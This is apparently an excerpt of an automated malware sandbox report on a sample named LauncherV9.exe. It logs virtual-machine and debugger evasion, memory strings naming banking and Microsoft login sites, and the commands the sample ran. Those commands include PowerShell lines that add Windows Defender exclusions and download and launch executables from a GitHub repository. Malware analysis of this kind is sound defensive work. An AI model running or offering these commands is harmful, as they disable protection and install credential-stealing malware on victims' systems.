Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\dll.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\dll.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\dll.exe

Code function: 16_2_02E33583 rdtsc

16_2_02E33583

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5399	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4466	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5502	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4314	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5091	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4593	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4839
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4171

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000	Thread sleep count: 5399 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6864	Thread sleep count: 4466 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1224	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6596	Thread sleep count: 5502 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000	Thread sleep count: 4314 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5248	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728	Thread sleep count: 5091 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728	Thread sleep count: 4593 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8204	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8216	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe TID: 8388	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe TID: 8368	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8344	Thread sleep count: 4839 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8344	Thread sleep count: 4171 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8392	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8404	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8416	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Service.exe TID: 8756	Thread sleep time: -85000s >= -30000s
Source: C:\Users\user\AppData\Local\Service.exe TID: 8912	Thread sleep time: -75000s >= -30000s
Source: C:\Users\user\AppData\Local\Service.exe TID: 9020	Thread sleep time: -65000s >= -30000s

Source: C:\Users\user\AppData\Local\dll.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Service.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Service.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Service.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF74632A334 FindFirstFileExW,		0_2_00007FF74632A334
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C13160 FindFirstFileExW,		22_2_00007FF621C13160

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: dll.exe, 00000010.00000003.1473827538.000000000403C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: jaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.000000000136C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400600163.000000000136C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553303136.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1587060011.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1573715800.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1611942390.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527895774.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436310085.00000000011FB000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527625878.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610970478.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: dll.exe, 00000010.00000002.1611384789.00000000003CF000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: &VBoxService.exe
Source: Service.exe, 00000016.00000002.2513052311.00000261425CF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW^
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: dll.exe, 00000010.00000002.1611384789.00000000003CF000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: VBoxService.exe
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: jaclo.exe, 0000000D.00000002.1400014459.0000000000D48000.00000040.00000001.01000000.00000005.sdmp, dll.exe, 00000010.00000002.1611384789.0000000000519000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: ~VirtualMachineTypes
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: jaclo.exe, 0000000D.00000002.1400014459.0000000000D48000.00000040.00000001.01000000.00000005.sdmp, dll.exe, 00000010.00000002.1611384789.0000000000519000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: ]DLL_Loader_VirtualMachine
Source: dll.exe, 00000010.00000002.1611384789.00000000003CF000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: VMWare
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: jaclo.exe, 0000000D.00000002.1400014459.0000000000D48000.00000040.00000001.01000000.00000005.sdmp, dll.exe, 00000010.00000002.1611384789.0000000000519000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: dll.exe, 00000010.00000003.1553303136.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1587060011.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1573715800.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527895774.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436310085.00000000011FB000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527625878.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610970478.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\Desktop\LauncherV9.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

graph_0-22221

Hides threads from debuggers

Source: C:\zjxbeopkqt\jaclo.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\AppData\Local\dll.exe

Code function: 16_2_02E33583 rdtsc

16_2_02E33583

Source: C:\zjxbeopkqt\jaclo.exe

Code function: 13_2_00BE81D0 LdrInitializeThunk,

13_2_00BE81D0

Source: C:\Users\user\Desktop\LauncherV9.exe

Code function: 0_2_00007FF74631A42C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF74631A42C

Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_02DC7F3B mov eax, dword ptr fs:[00000030h]	13_2_02DC7F3B
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_02DC7C6B mov eax, dword ptr fs:[00000030h]	13_2_02DC7C6B
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_02E37F17 mov eax, dword ptr fs:[00000030h]	16_2_02E37F17
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_02E37F19 mov eax, dword ptr fs:[00000030h]	16_2_02E37F19
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_02E37C4F mov eax, dword ptr fs:[00000030h]	16_2_02E37C4F

Source: C:\Users\user\Desktop\LauncherV9.exe

Code function: 0_2_00007FF74632BFD8 GetProcessHeap,

0_2_00007FF74632BFD8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF7463125DC SetUnhandledExceptionFilter,	0_2_00007FF7463125DC
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF74631A42C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF74631A42C
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF746312438 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF746312438
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF74631217C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF74631217C
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621BFCAAC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_00007FF621BFCAAC
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C05AA8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_00007FF621C05AA8
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621BFCC50 SetUnhandledExceptionFilter,	22_2_00007FF621BFCC50
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621BFC028 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_00007FF621BFC028

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"	Jump to behavior

Source: C:\Users\user\Desktop\LauncherV9.exe

Code function: 0_2_00007FF746303030 GetModuleFileNameW,ShellExecuteW,

0_2_00007FF746303030

Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\zjxbeopkqt\jaclo.exe "C:\zjxbeopkqt\jaclo.exe"	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Users\user\AppData\Local\dll.exe "C:\Users\user\AppData\Local\dll.exe"	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Users\user\AppData\Local\Service.exe "C:\Users\user\AppData\Local\Service.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'"

Source: C:\Users\user\Desktop\LauncherV9.exe

Code function: 0_2_00007FF746304920 GetConsoleWindow,ShowWindow,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,_Thrd_detach,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,std::_Throw_Cpp_error,std::_Throw_Cpp_error,std::_Throw_Cpp_error,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,std::_Throw_Cpp_error,std::_Throw_Cpp_error,std::_Throw_Cpp_error,std::_Throw_Cpp_error,std::_Throw_Cpp_error,std::_Throw_Cpp_error,std::_Throw_Cpp_error,

0_2_00007FF746304920

Source: C:\Users\user\Desktop\LauncherV9.exe

Code function: 0_2_00007FF746333BD0 cpuid

0_2_00007FF746333BD0

Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: EnumSystemLocalesW,	0_2_00007FF746321F64
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: GetLocaleInfoW,	0_2_00007FF74632E848
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: EnumSystemLocalesW,	0_2_00007FF74632E568
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00007FF74632E600
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00007FF74632EB84
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: GetLocaleInfoW,	0_2_00007FF74632243C
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: EnumSystemLocalesW,	0_2_00007FF74632E498
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_00007FF74632E13C
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00007FF74632E9A0
